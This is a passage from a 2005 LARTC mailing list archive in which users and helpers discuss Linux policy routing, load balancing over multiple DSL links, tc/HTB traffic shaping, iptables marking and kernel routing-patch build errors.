rule for smtp table > > ip rule add fwmak 1 table smtp > > this would have to work, but is not redirecting nothing... > > i can see that is making the packets with 1 using the command iptables -t mangle -L PREROUTING -v but is not working, any one can help me? I am not sure, but I think your rules will just make smtp packets try to use 192.168.0.2 as a gateway rather than whatever your normal gateway is. I guess you really need to dnat them to 192.168.0.2. using iptables. Andy. From andy.furniss@dsl.pipex.com Tue Feb 8 01:48:34 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Tue, 08 Feb 2005 01:48:34 +0000 Subject: [LARTC] How to route certain ports to other link In-Reply-To: <20050205144442.723.qmail@web30504.mail.mud.yahoo.com> References: <20050205144442.723.qmail@web30504.mail.mud.yahoo.com> Message-ID: <42081A72.4090605@dsl.pipex.com> root linux wrote: > Hi, > > I have one satellite link and one sdsl link. And, one > LAN link. > > My load balancing is working great with a iptables's > masquerading (no fw rules). > > Now, I need to route the following ports to my sdsl > link: - > > 20, 21, 22, 25, 80, 110, 143, and 443 > > Whereas the others go to my satellite link. > > Does anyone done this before? Not me - but have a look at policy routing in the HowTo or on http://www.linux-ip.net . Andy. From andy.furniss@dsl.pipex.com Tue Feb 8 02:00:48 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Tue, 08 Feb 2005 02:00:48 +0000 Subject: [LARTC] problems with u32 fiter In-Reply-To: <200502061213.30560.listas@pablodanielrey.com.ar> References: <200502061213.30560.listas@pablodanielrey.com.ar> Message-ID: <42081D50.40603@dsl.pipex.com> listas@pablodanielrey.com.ar wrote: > hello to all > i'm trying to set a filter but doesn't want to work. > i've set ut the qdiscs and the classes like this : > > tc qdisc add dev ppp0 root handle 1: htb default 20 > tc class add dev ppp0 parent 1: classid 1:1 htb rate 120kbit > tc class add dev ppp0 parent 1:1 classid 1:20 htb rate 30kbit ceil 120kbit > tc class add dev ppp0 parent 1:1 classid 1:21 htb rate 30kbit ceil 120kbit > tc class add dev ppp0 parent 1:1 classid 1:22 htb rate 30kbit ceil 120kbit > tc class add dev ppp0 parent 1:1 classid 1:23 htb rate 30kbit ceil 120kbit > tc qdisc add dev ppp0 parent 1:20 handle 20: prio > tc qdisc add dev ppp0 parent 1:21 handle 21: prio > tc qdisc add dev ppp0 parent 1:22 handle 22: prio > tc qdisc add dev ppp0 parent 1:23 handle 23: prio > > but when i try to set up the filters : > > tc filter add dev ppp0 parent 1:0 prio 1 u32 match ip src 192.168.0.2 flowid 1:23 > tc filter add dev ppp0 parent 1:0 prio 1 u32 match ip src 192.168.2.2 flowid 1:22 > tc filter add dev ppp0 parent 1:0 prio 1 u32 match ip src 192.168.0.1 flowid 1:21 you need protocol ip before u32 eg. tc filter add dev ppp0 parent 1:0 protocol ip prio 1 u32 match ip src 192.168.0.2 flowid 1:23 Andy. From erwan le doeuff Tue Feb 8 02:13:00 2005 From: erwan le doeuff (erwan le doeuff) Date: Mon, 7 Feb 2005 17:13:00 -0900 Subject: [LARTC] TC GUI or graphs? Message-ID: <5028185c05020718133b833b26@mail.gmail.com> Here is a software for managing QoS (HTB) on multiple Linux system simultaneoulsy which a single remote GTK2 GUI. http://sourceforge.net/projects/rcc/ Read the INSTALL file before launching! I hope you will enjoy! Regards, Erwan Le Doeuff From lists@llondel.org Tue Feb 8 08:51:49 2005 From: lists@llondel.org (Mailing List Account) Date: Tue, 08 Feb 2005 08:51:49 +0000 Subject: [LARTC] Basic iproute configuration questions Message-ID: <42087DA5.7080105@llondel.org> I've managed to get myself confused with what is probably quite simple so if there's any definitive documentation then please give me pointers. I've read and tried the nano.txt document, that's what I've based my current setup on and it isn't working at the moment. I have two external links, a DSL link on eth1 and a cable link on eth2. Both acquire their addresses via DHCP. The local network lives on eth0 and has a static IP. The local network uses NAT to the outside world. I need to be able to load balance between the two external links for general outgoing traffic, force all outbound smtp traffic via eth1 and be able to handle inbound traffic to various servers (IMAP, web, SMTP, etc) on either link. My starting point is an old Pentium-2 box with three network cards, running a fully-patched version of FC2 (kernel 2.6.10-1.12_FC2). I had an old version that sort of worked on RH7.3 but it didn't do load balancing (in those days the DSL link was an ISDN link so it wasn't important) and handling inbound stuff was a crude hack[*] that I'm sure isn't the best way to do things. So, what do I need to do? Am I missing a required kernel patch or should the stock kernel be capable of what I want? Argh! Dave From Kenneth Kalmer Tue Feb 8 09:13:30 2005 From: Kenneth Kalmer (Kenneth Kalmer) Date: Tue, 8 Feb 2005 11:13:30 +0200 Subject: [LARTC] Shaping and forward Message-ID: Lartc readers I have a peculiar problem with shaping and firewalling. My tc rules work great, below is a smaller version: #Root tc qdisc del dev eth0 root tc qdisc add dev eth0 root handle 1: htb default 100 #Root Class tc class add dev eth0 parent 1: classid 1:1 htb rate 1024kbit quantum 20000 burst 15k #Class for each user tc class add dev eth0 parent 1:1 classid 1:2 htb rate 32kbit ceil 128kbit prio 0 quantum 20000 burst 15k tc class add dev eth0 parent 1:1 classid 1:3 htb rate 32kbit ceil 128kbit prio 0 quantum 20000 burst 15k ... # SFQ qdisc for each user class tc qdisc add dev eth0 parent 1:2 handle 12: sfq perturb 10 tc qdisc add dev eth0 parent 1:3 handle 13: sfq perturb 10 ... #Filters tc filter add dev eth0 protocol ip parent 1: prio 0 handle 2 fw classid 1:2 tc filter add dev eth0 protocol ip parent 1: prio 0 handle 3 fw classid 1:3 ... #iptables mangle rules iptables -t mangle -A POSTROUTING -o eth1 -d 192.168.0.1 -j MARK --set-mark 2 iptables -t mangle -A POSTROUTING -o eth1 -d 192.168.0.2 -j MARK --set-mark 2 ... #iptables allow forwarding on MAC address iptables -A FORWARD -o ppp0 -m mac --mac-source 00:0D:61:30:10:75 -j ACCEPT iptables -A FORWARD -o eth1 -m mac --mac-source 00:10:B5:01:AA:D0 -j ACCEPT ... Should note that the default policy of filter->forward is DROP. All other chains are defaulting on ACCEPT Now, no users can connect through the gateway. Our test traffic for the shapping works perfectly, but no internet traffic works. iptables -nvL output shows that the packets move through the forward chain in filter, but it doesn't reach the mangle table for marking the packets. It's as if the packets disappear... Anybody got some ideas? I still have to test the shaping using u32 matching, using iptables to do forwarding. Thanks in advance -- Kenneth Kalmer From andy.furniss@dsl.pipex.com Tue Feb 8 12:15:59 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Tue, 08 Feb 2005 12:15:59 +0000 Subject: [LARTC] Shaping and forward In-Reply-To: References: Message-ID: <4208AD7F.5090605@dsl.pipex.com> Kenneth Kalmer wrote: > Lartc readers > > I have a peculiar problem with shaping and firewalling. > > My tc rules work great, below is a smaller version: > > #Root > tc qdisc del dev eth0 root > tc qdisc add dev eth0 root handle 1: htb default 100 > > #Root Class > tc class add dev eth0 parent 1: classid 1:1 htb rate 1024kbit quantum > 20000 burst 15k > > #Class for each user > tc class add dev eth0 parent 1:1 classid 1:2 htb rate 32kbit ceil > 128kbit prio 0 quantum 20000 burst 15k > tc class add dev eth0 parent 1:1 classid 1:3 htb rate 32kbit ceil > 128kbit prio 0 quantum 20000 burst 15k > ... > > # SFQ qdisc for each user class > tc qdisc add dev eth0 parent 1:2 handle 12: sfq perturb 10 > tc qdisc add dev eth0 parent 1:3 handle 13: sfq perturb 10 > ... > > #Filters > tc filter add dev eth0 protocol ip parent 1: prio 0 handle 2 fw classid 1:2 > tc filter add dev eth0 protocol ip parent 1: prio 0 handle 3 fw classid 1:3 > ... > > #iptables mangle rules > iptables -t mangle -A POSTROUTING -o eth1 -d 192.168.0.1 -j MARK --set-mark 2 > iptables -t mangle -A POSTROUTING -o eth1 -d 192.168.0.2 -j MARK --set-mark 2 You are shaping on eth0 but marking -o eth1 > ... > > #iptables allow forwarding on MAC address > iptables -A FORWARD -o ppp0 -m mac --mac-source 00:0D:61:30:10:75 -j ACCEPT > iptables -A FORWARD -o eth1 -m mac --mac-source 00:10:B5:01:AA:D0 -j ACCEPT > ... You need a rule to accept -i ppp0. Andy. > > Should note that the default policy of filter->forward is DROP. All > other chains are defaulting on ACCEPT > > Now, no users can connect through the gateway. Our test traffic for > the shapping works perfectly, but no internet traffic works. iptables > -nvL output shows that the packets move through the forward chain in > filter, but it doesn't reach the mangle table for marking the packets. > It's as if the packets disappear... > > Anybody got some ideas? I still have to test the shaping using u32 > matching, using iptables to do forwarding. > > Thanks in advance > From 64vn@cardvn.net Tue Feb 8 12:50:09 2005 From: 64vn@cardvn.net (Nguyen Dinh Nam) Date: Tue, 08 Feb 2005 19:50:09 +0700 Subject: [LARTC] Basic iproute configuration questions In-Reply-To: <42087DA5.7080105@llondel.org> References: <42087DA5.7080105@llondel.org> Message-ID: <4208B581.90909@cardvn.net> If nano-howto doesn't work, you should consult my different approach: http://selab.edu.ms/twiki/bin/view/Networking/MultihomedLinuxNetworking the tutorial comes with a completed daemon so you have a handy solution http://selab.edu.ms/twiki/bin/view/Networking/RoutesKeeperProject Mailing List Account wrote: > I've managed to get myself confused with what is probably quite simple > so if there's any definitive documentation then please give me > pointers. I've read and tried the nano.txt document, that's what I've > based my current setup on and it isn't working at the moment. > > I have two external links, a DSL link on eth1 and a cable link on > eth2. Both acquire their addresses via DHCP. The local network lives > on eth0 and has a static IP. The local network uses NAT to the outside > world. > > I need to be able to load balance between the two external links for > general outgoing traffic, force all outbound smtp traffic via eth1 and > be able to handle inbound traffic to various servers (IMAP, web, SMTP, > etc) on either link. My starting point is an old Pentium-2 box with > three network cards, running a fully-patched version of FC2 (kernel > 2.6.10-1.12_FC2). > > I had an old version that sort of worked on RH7.3 but it didn't do > load balancing (in those days the DSL link was an ISDN link so it > wasn't important) and handling inbound stuff was a crude hack[*] that > I'm sure isn't the best way to do things. > > So, what do I need to do? Am I missing a required kernel patch or > should the stock kernel be capable of what I want? Argh! > > Dave > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > From 64vn@cardvn.net Tue Feb 8 12:55:51 2005 From: 64vn@cardvn.net (Nguyen Dinh Nam) Date: Tue, 08 Feb 2005 19:55:51 +0700 Subject: [LARTC] please guide me ...with regard to multipath dynamic routing in case of link failure In-Reply-To: <003201c50d24$5e650670$8d00150a@dreammac> References: <003201c50d24$5e650670$8d00150a@dreammac> Message-ID: <4208B6D7.1040503@cardvn.net> So you have to write a daemon to ping the remote gateway, and if ping fails, the daemon will remove that nexthop from the multipath route. The dead gateway detection patch can't help you in this case. That's why I created this project, download and run it, and everything solved, it's lack of documentation, so you're welcome to write it in the Wiki. http://selab.edu.ms/twiki/bin/view/Networking/RoutesKeeperProject Pankaj Agarwal wrote: > Hi, > > There's some very silly mistake i've done in my configuration. I did > by reading material on web. I'm enclosing my configuration script > below. The problem is its not routing the trafic from other interface > in case the first interface is down....which should be the wright > case. Kindly please guide me what i can do to make it > work..dynamically.. Also there is a very common situation which many > of you might have face...the interface which is gateway for my device > is my local router interface...and there's almost no chance of that's > being down ever...How can one configure ip route to consider the ISP > ends IP as the gateway when deciding on link status... > > Thanks, > > Pankaj Agarwal From lists@wildgooses.com Tue Feb 8 23:49:39 2005 From: lists@wildgooses.com (Ed Wildgoose) Date: Tue, 08 Feb 2005 23:49:39 +0000 Subject: [LARTC] TCP window based shaping Message-ID: <42095013.8030600@wildgooses.com> Does anyone have any pointers on how other people have implemented tcp window adjustment to do bandwidth shaping? Granted the basic idea is to set the window size to be RTT * bandwidth, but a quick squiz at google turns up mostly papers on how to implement this at the sender end with a view to some new magic TCP implementation. I'm really interested in notes on how to implement at the router side, perhaps with a view to writing a new QOS module. Biggest issue I can see right now is an architecture one, ie monitoring the incoming packet rate and then applying that to the outgoing ACK packets. Linux QOS separates the in and out traffic modules. Wondering how one best communicates this info... Thanks for any thoughts Ed W From david_list@boreham.org Tue Feb 8 23:57:28 2005 From: david_list@boreham.org (David Boreham) Date: Tue, 8 Feb 2005 15:57:28 -0800 Subject: [LARTC] TCP window based shaping References: <42095013.8030600@wildgooses.com> Message-ID: <083401c50e39$f23d3730$da529145@mtbrook.bozemanpass.com> > Does anyone have any pointers on how other people have implemented tcp > window adjustment to do bandwidth shaping? Hmm....I _heard_ that Packeteer had patents on this and so nobody else was attempting to do it. Possibly an incorrect rumor, but it made sense to me. From andy.furniss@dsl.pipex.com Wed Feb 9 01:59:47 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Wed, 09 Feb 2005 01:59:47 +0000 Subject: [LARTC] TCP window based shaping In-Reply-To: <083401c50e39$f23d3730$da529145@mtbrook.bozemanpass.com> References: <42095013.8030600@wildgooses.com> <083401c50e39$f23d3730$da529145@mtbrook.bozemanpass.com> Message-ID: <42096E93.3020906@dsl.pipex.com> David Boreham wrote: > >> Does anyone have any pointers on how other people have implemented tcp >> window adjustment to do bandwidth shaping? > > > Hmm....I _heard_ that Packeteer had patents on this and > so nobody else was attempting to do it. > > Possibly an incorrect rumor, but it made sense to me. They say on their site that their algorithm is patented which could be a pain if it's the obvious solution. The more I think about it (probably not enough yet), the more I think that just keeping state and depiggybacking acks could achieve much the same thing if your shaper is clever enough. The worst senario for me is bittorrent, and if I could depiggyback the acks I don't see that playing with window size on top of that would be any better than keeping state so that I had an idea of how much was unstoppably on the way. Closing the window down isn't going to stop what's allready left the sender and is sitting in a big modem buffer any quicker than me stopping sending acks. Just knowing how lagged out each connection is would be enough to allow me to change bandwidth more elegantly without too much buffer filling. Not with anything that exists in Linux now - but even just hacking HTB/HFSC so that a class could behave as full as soon as it sees traffic would be a start. I can allready sort of break slowstart by treating new connections harshly (short queue), though it would be nice in the case of bittorrent to be able to detect connections that go back into slowstart aswell - sfq sort of singles them out, but it's a bit late by the time it gets them. I guess there are other things you could do aswell like trying to account for different rtts with the intention of avoiding bursts. Andy. From iavramop@Princeton.EDU Wed Feb 9 07:27:55 2005 From: iavramop@Princeton.EDU (Ioannis C Avramopoulos (iavramop@Princeton.EDU)) Date: Wed, 09 Feb 2005 02:27:55 -0500 Subject: [LARTC] A question on the iproute default queues Message-ID: <3853fab2779e.4209752b@Princeton.EDU> Hi, when iproute is installed then the default queue that it is giving to an interface is pfifo_fast. I would like to ask whether it is possible to disable this feature and rather have the kernel give by default to an interface the queue that it would give if iproute hadn't been installed. I want to be able to customize the queue with tc only when it is necessary. Is this possible? Regards, Yannis From doc@lanaticasylum.de Wed Feb 9 07:56:39 2005 From: doc@lanaticasylum.de (Marcus Schmid) Date: Wed, 9 Feb 2005 08:56:39 +0100 (CET) Subject: [LARTC] Multihop route - TCP connection losses? Message-ID: Hi! In our students' hostel we have 6 DSL lines (dialups to different providers); we have set up a linux box (currently running 2.6.11-rc2-mm2, but the problem described hereafter also applies to previous 2.6-series kernels) with help from http://lartc.org/howto/lartc.rpdb.multiple-links.html#AEN298 Our Setup looks like this: 10.0.0.0/8 10.70.255.1 +----------+ +-----------+ | intranet |---| linux-box | +----------+ +-----------+ 10.254.0.1 | | | +-----------+ | | +-----| HW-router |---(DSL -> Provider) | | +-----------+ | | | +--------- (see above) [10.254.0.2] +------------- (see above) [10.254.0.3] (Above schematics drawn with only 3 instead of 6 DSL links) Our problem is as follows: it seems that when the route cache expires also existing TCP connections are rerouted, causing the connection to get lost. (Just a theory - I don't know how to check that) While that is fully comprehensible with UDP traffic, I thought I read somewhere that this shouldn't apply to TCP traffic (connections - once established - will always be routed through the initial hop). Does anyone know how to avoid this problem (which makes downloading big files a pain as some download-manager has to be used that supports appending/byte ranges)? Am I doing something wrong here, did I forget something? Our Setup is as simple as setting a multihop default route on the linux box like this: ip route add default proto static \ nexthop via 10.254.0.2 dev eth0 \ nexthop via 10.254.0.3 dev eth0 \ nexthop via 10.254.0.1 dev eth0 \ nexthop via 10.254.0.4 dev eth0 \ nexthop via 10.254.0.5 dev eth0 We don't do any NAT as this is done by the hardware DSL routers. Thank you for any help! Marcus ------------------------------------------------------------------------- The most difficult thing in the world is to know how to do a thing and to watch somebody else doing it wrong, without comment. From Robert Kurjata Wed Feb 9 08:18:35 2005 From: Robert Kurjata (Robert Kurjata) Date: Wed, 9 Feb 2005 09:18:35 +0100 Subject: [LARTC] Multihop route - TCP connection losses? In-Reply-To: References: Message-ID: <417042528.20050209091835@ire.pw.edu.pl> Witaj Marcus, W Twoim liœcie datowanym 9 lutego 2005 (08:56:39) mo¿na przeczytaæ: Mamy many yeas ago...... I faced the same problem :) The answer is in nano-howto. http://www.ssi.bg/~ja/ (look for nano-txt) and look at the my WORKING example script placed there by Julian http://www.ssi.bg/~ja/tmp/mpath2.sh That script was originally used with success with 4 uplinks (shorthened for the simplicity). > Hi! > In our students' hostel we have 6 DSL lines (dialups to different > providers); we have set up a linux box (currently running 2.6.11-rc2-mm2, > but the problem described hereafter also applies to previous 2.6-series > kernels) with help from > http://lartc.org/howto/lartc.rpdb.multiple-links.html#AEN298 > Our Setup looks like this: > 10.0.0.0/8 10.70.255.1 > +----------+ +-----------+ > | intranet |---| linux-box | > +----------+ +-----------+ 10.254.0.1 > | | | +-----------+ > | | +-----| HW-router |---(DSL -> Provider) > | | +-----------+ > | | > | +--------- (see above) [10.254.0.2] > +------------- (see above) [10.254.0.3] > (Above schematics drawn with only 3 instead of 6 DSL links) > Our problem is as follows: it seems that when the route cache expires also > existing TCP connections are rerouted, causing the connection to get lost. > (Just a theory - I don't know how to check that) > While that is fully comprehensible with UDP traffic, I thought I read > somewhere that this shouldn't apply to TCP traffic (connections - once > established - will always be routed through the initial hop). > Does anyone know how to avoid this problem (which makes downloading big > files a pain as some download-manager has to be used that supports > appending/byte ranges)? Am I doing something wrong here, did I forget > something? > Our Setup is as simple as setting a multihop default route on the linux > box like this: > ip route add default proto static \ > nexthop via 10.254.0.2 dev eth0 \ > nexthop via 10.254.0.3 dev eth0 \ > nexthop via 10.254.0.1 dev eth0 \ > nexthop via 10.254.0.4 dev eth0 \ > nexthop via 10.254.0.5 dev eth0 > We don't do any NAT as this is done by the hardware DSL routers. > Thank you for any help! > Marcus > ------------------------------------------------------------------------- > The most difficult thing in the world is to know how to do a thing and to > watch somebody else doing it wrong, without comment. > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ -- Pozdrowienia, Robert Kurjata From fun@dominic.idv.tw Wed Feb 9 10:13:34 2005 From: fun@dominic.idv.tw (fun) Date: Wed, 9 Feb 2005 18:13:34 +0800 Subject: [LARTC] problems with 2.4.28 + Julian's patch Message-ID: <20050209100705.M95153@kh.premtek.com.tw> I am using kernel 2.6.9 (gentoo,AMD64 version) + routes-2.6.9-11.diff If compile kernel with gcc 3.4.3, then the similar error comes out: ------------------ net/ipv4/fib_frontend.c: In function `fib_validate_source': include/net/ip_fib.h:181: sorry, unimplemented: inlining failed in call to 'fib_result_table': function body not available net/ipv4/fib_frontend.c:204: sorry, unimplemented: called from here include/net/ip_fib.h:181: sorry, unimplemented: inlining failed in call to 'fib_result_table': function body not available net/ipv4/fib_frontend.c:214: sorry, unimplemented: called from here make[2]: *** [net/ipv4/fib_frontend.o] Error 1 make[1]: *** [net/ipv4] Error 2 make: *** [net] Error 2 ------------------- Anyway, it will be OK if use gcc 3.3.5 to compile. Can Julian check that? Thanks! BR, Dominic Lu From ja@ssi.bg Wed Feb 9 10:39:22 2005 From: ja@ssi.bg (Julian Anastasov) Date: Wed, 9 Feb 2005 12:39:22 +0200 (EET) Subject: [LARTC] problems with 2.4.28 + Julian's patch In-Reply-To: <20050209100705.M95153@kh.premtek.com.tw> Message-ID: Hello, On Wed, 9 Feb 2005, fun wrote: > I am using kernel 2.6.9 (gentoo,AMD64 version) + routes-2.6.9-11.diff > If compile kernel with gcc 3.4.3, then the similar error comes out: > > ------------------ > net/ipv4/fib_frontend.c: In function `fib_validate_source': > include/net/ip_fib.h:181: sorry, unimplemented: inlining failed in call to 'fib_result_table': function body not > available > net/ipv4/fib_frontend.c:204: sorry, unimplemented: called from here > include/net/ip_fib.h:181: sorry, unimplemented: inlining failed in call to 'fib_result_table': function body not > available > net/ipv4/fib_frontend.c:214: sorry, unimplemented: called from here > make[2]: *** [net/ipv4/fib_frontend.o] Error 1 > make[1]: *** [net/ipv4] Error 2 > make: *** [net] Error 2 > ------------------- > > Anyway, it will be OK if use gcc 3.3.5 to compile. Can Julian check that? Thanks! It should be fixed month ago but you need routes-2.6.10-12.diff. Another option is to remove the fib_result_table "__inline__" from include/net/ip_fib.h > BR, > Dominic Lu Regards -- Julian Anastasov From marcogh@linux.it Wed Feb 9 11:34:44 2005 From: marcogh@linux.it (marco ghidinelli) Date: Wed, 9 Feb 2005 12:34:44 +0100 Subject: [LARTC] TCP window based shaping In-Reply-To: <42095013.8030600@wildgooses.com> References: <42095013.8030600@wildgooses.com> Message-ID: <20050209113444.GA11322@circolab.net> On Tue, Feb 08, 2005 at 11:49:39PM +0000, Ed Wildgoose wrote: > Does anyone have any pointers on how other people have implemented tcp > window adjustment to do bandwidth shaping? > > Granted the basic idea is to set the window size to be RTT * bandwidth, > but a quick squiz at google turns up mostly papers on how to implement > this at the sender end with a view to some new magic TCP > implementation. I'm really interested in notes on how to implement at > the router side, perhaps with a view to writing a new QOS module. > > Biggest issue I can see right now is an architecture one, ie monitoring > the incoming packet rate and then applying that to the outgoing ACK > packets. instead of shaping the incoming traffic and estimate rate from the outgoing traffic, you can 'delay' the outgoing ACK, and estimate the rate from the raise of the sequence number. so you just shape on the outgoing queue, without take care of the incoming traffic. note that everything here is patented, so if you must have lawyers, if you want to develop.. :-/ http://patft.uspto.gov/netacgi/nph-Parser?Sect1=PTO2&Sect2=HITOFF&p=1&u=%2Fnetahtml%2Fsearch-bool.html&r=0&f=S&l=50&TERM1=packeteer&FIELD1=&co1=AND&TERM2=&FIELD2=&d=ptxt -- BOFH excuse #33: pizeo-electric interference From fun@dominic.idv.tw Wed Feb 9 12:39:50 2005 From: fun@dominic.idv.tw (fun) Date: Wed, 9 Feb 2005 20:39:50 +0800 Subject: [LARTC] problems with 2.4.28 + Julian's patch In-Reply-To: References: <20050209100705.M95153@kh.premtek.com.tw> Message-ID: <20050209123701.M53981@dominic.idv.tw> Thanks Julian! The kernel build is OK after the fib_result_table "__inline__" is removed. BR, Dominic Lu > > Anyway, it will be OK if use gcc 3.3.5 to compile. Can Julian check that? Thanks! > > It should be fixed month ago but you need routes-2.6.10-12.diff. > Another option is to remove the fib_result_table "__inline__" from > include/net/ip_fib.h > From carlos@www.senecacom.net Wed Feb 9 14:19:34 2005 From: carlos@www.senecacom.net (Carlos Alperin) Date: Wed, 9 Feb 2005 10:19:34 -0400 Subject: [LARTC] A newbie question Message-ID: <20050209141459.M33380@www.senecacom.net> This issue may sounds trivial I need to build a Router for send Internet + VoIP traffic. The computers are in a different network that the Phone Gateway. The Computers are going to be send to a 3 Mbps connection using OSPF, in the meantime the phones are going to be send to a T1 using OSPF too. The routing software is going to be Zebra. I need to switch the outgoing in case that the T1 or the 3 Mbps link goes down, and shape the traffic. The router is going to have 3 Ethernet ports plus the T1 card. Any suggestion? Carlos Alperin carlos@senecacom.net calperin@senecacom.net From Bernardo Silveira Wed Feb 9 16:41:12 2005 From: Bernardo Silveira (Bernardo Silveira) Date: Wed, 9 Feb 2005 14:41:12 -0200 Subject: [LARTC] Multiple gateways setup and timeout connections In-Reply-To: References: <28dab43f05020411011c0906c@mail.gmail.com> Message-ID: <28dab43f05020908413bc263d8@mail.gmail.com> On Mon, 7 Feb 2005 10:58:30 +0100, Uwe Kamper wrote: > > Hi, > > > > I've setup a gateway using multiple default gateways and netfilter > > MASQUERADE to load balance traffic between two DSL interfaces and one > > dedicated link, and when I try to download something big, or when I'm > > using MSN (both in clients under this gateway), sometimes, or most > > times, after a while the connection timeouts. The connection doesn't > > seem to change its gateway (verified using ip route list cache) >=20 > Hello, >=20 > did you apply the patch mentioned under section 4.2.2 of the LARTC.org- > HOWTO ( http://lartc.org/howto/lartc.rpdb.multiple-links.html#AEN298 or > http://www.ssi.bg/~ja/#routes ) to your Linux kernel sources? >=20 >=20 > Uwe Kamper Yes, I've tested with and without them, in kernels 2.4.22 and 2.6.10. Bernardo Silveira Via IP Solu=E7=F5es para Internet Ltda From ro0ot@phreaker.net Wed Feb 9 18:20:56 2005 From: ro0ot@phreaker.net (ro0ot) Date: Thu, 10 Feb 2005 02:20:56 +0800 Subject: [LARTC] load balancing between two dsl links Message-ID: <420A5488.4000300@phreaker.net> Hi, I am connected to two DSL providers (DSL 1 - 1Mbps downlink/384kbps uplink and DSL 2 - 2Mbps downlink/512kpbs uplink) I would like to only allow ftp, pop3 and http via the DSL 1 and only smtp, ipsec and pptp via DSL 2. How can I do so? Can I use iproute to route these protocols? Below is my ip routing: - # DSL 1 ip route add 2.2.2.208/30 dev eth0 src 2.2.2.210 table 1 ip route add default via 2.2.2.209 table 1 # DSL 2 ip route add 3.3.3.116/30 dev eth2 src 3.3.3.118 table 2 ip route add default via 3.3.3.117 table 2 ip rule add from 2.2.2.208/30 lookup 1 ip rule add from 3.3.3.116/30 lookup 2 ip route add 3.3.3.116/30 dev eth2 table 1 ip route add 10.59.2.0/24 dev eth1 table 1 ip route add 127.0.0.0/8 dev lo table 1 ip route add 2.2.2.208/30 dev eth0 table 2 ip route add 10.59.2.0/24 dev eth1 table 2 ip route add 127.0.0.0/8 dev lo table 2 ip route add default scope global nexthop via 2.2.2.209 dev eth0 weight 1 nexthop via 3.3.3.117 dev eth2 weight 1 Below is my iptables: - lanif="eth1" squid_box="10.59.2.3" lan_net="10.59.2.0/24" $ECHO 1 > /proc/sys/net/ipv4/ip_forward $IPTABLES -t nat -A PREROUTING -i $lanif -s ! $squid_box -p tcp --dport 80 -j DNAT --to $squid_box:3128 $IPTABLES -t nat -A POSTROUTING -o $lanif -s $lan_net -d $squid_box -j SNAT --to $lan_ip $IPTABLES -A FORWARD -s $lan_net -d $squid_box -i $lanif -o $lanif -p tcp --dport 3128 -j ACCEPT $IPTABLES -t nat -A POSTROUTING -j MASQUERADE Regards, ro0ot From Bernardo Silveira Wed Feb 9 18:36:48 2005 From: Bernardo Silveira (Bernardo Silveira) Date: Wed, 9 Feb 2005 16:36:48 -0200 Subject: [LARTC] load balancing between two dsl links In-Reply-To: <420A5488.4000300@phreaker.net> References: <420A5488.4000300@phreaker.net> Message-ID: <28dab43f050209103670b12985@mail.gmail.com> On Thu, 10 Feb 2005 02:20:56 +0800, ro0ot wrote: > Hi, >=20 > I am connected to two DSL providers (DSL 1 - 1Mbps downlink/384kbps > uplink and DSL 2 - 2Mbps downlink/512kpbs uplink) >=20 > I would like to only allow ftp, pop3 and http via the DSL 1 and only > smtp, ipsec and pptp via DSL 2. >=20 > How can I do so? Can I use iproute to route these protocols? >=20 > Below is my ip routing: - >=20 > # DSL 1 > ip route add 2.2.2.208/30 dev eth0 src 2.2.2.210 table 1 > ip route add default via 2.2.2.209 table 1 >=20 > # DSL 2 > ip route add 3.3.3.116/30 dev eth2 src 3.3.3.118 table 2 > ip route add default via 3.3.3.117 table 2 >=20 > ip rule add from 2.2.2.208/30 lookup 1 > ip rule add from 3.3.3.116/30 lookup 2 >=20 > ip route add 3.3.3.116/30 dev eth2 table 1 > ip route add 10.59.2.0/24 dev eth1 table 1 > ip route add 127.0.0.0/8 dev lo table 1 >=20 > ip route add 2.2.2.208/30 dev eth0 table 2 > ip route add 10.59.2.0/24 dev eth1 table 2 > ip route add 127.0.0.0/8 dev lo table 2 >=20 > ip route add default scope global nexthop via 2.2.2.209 dev eth0 weight > 1 nexthop via 3.3.3.117 dev eth2 weight 1 >=20 > Below is my iptables: - >=20 > lanif=3D"eth1" > squid_box=3D"10.59.2.3" > lan_net=3D"10.59.2.0/24" >=20 > $ECHO 1 > /proc/sys/net/ipv4/ip_forward >=20 > $IPTABLES -t nat -A PREROUTING -i $lanif -s ! $squid_box -p tcp --dport > 80 -j DNAT --to $squid_box:3128 > $IPTABLES -t nat -A POSTROUTING -o $lanif -s $lan_net -d $squid_box -j > SNAT --to $lan_ip > $IPTABLES -A FORWARD -s $lan_net -d $squid_box -i $lanif -o $lanif -p > tcp --dport 3128 -j ACCEPT >=20 > $IPTABLES -t nat -A POSTROUTING -j MASQUERADE >=20 > Regards, > ro0ot Hi, You can use: ipchains -A INPUT -p tcp -s 0/0 --dport 21 -m 1 ipchains -A INPUT -p tcp -s 0/0 --dport 110 -m 1 and ip rule add fwmark 1 table 1 prio 15000 And the same for the other DSL. BTW, is the current configuration working ok now? What kernel are you using, which patches? Because I'm using a similar configuration and I'm having issues with some connections timing out. Regards, Bernardo Silveira Via IP Solu=E7=F5es para Internet From 64vn@cardvn.net Wed Feb 9 22:29:59 2005 From: 64vn@cardvn.net (Nguyen Dinh Nam) Date: Thu, 10 Feb 2005 05:29:59 +0700 Subject: [LARTC] Multiple gateways setup and timeout connections In-Reply-To: <28dab43f05020908413bc263d8@mail.gmail.com> References: <28dab43f05020411011c0906c@mail.gmail.com> <28dab43f05020908413bc263d8@mail.gmail.com> Message-ID: <420A8EE7.4010206@cardvn.net> You have to CONNMARK them so outgoing connection don't get re-routed each time routing cache expires. I've written about prevent the expiring of connections in http://selab.edu.ms/twiki/bin/view/Networking/MultihomedLinuxNetworking Bernardo Silveira wrote: >Yes, >I've tested with and without them, in kernels 2.4.22 and 2.6.10. > > From andy.furniss@dsl.pipex.com Wed Feb 9 22:38:20 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Wed, 09 Feb 2005 22:38:20 +0000 Subject: [LARTC] TCP window based shaping In-Reply-To: <20050209113444.GA11322@circolab.net> References: <42095013.8030600@wildgooses.com> <20050209113444.GA11322@circolab.net> Message-ID: <420A90DC.6080108@dsl.pipex.com> marco ghidinelli wrote: > On Tue, Feb 08, 2005 at 11:49:39PM +0000, Ed Wildgoose wrote: > >>Does anyone have any pointers on how other people have implemented 